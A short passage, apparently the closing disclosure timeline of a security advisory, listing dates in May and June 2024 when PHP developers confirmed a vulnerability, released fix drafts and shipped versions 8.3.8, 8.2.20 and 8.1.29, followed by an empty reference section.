  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

Reference

❌
❌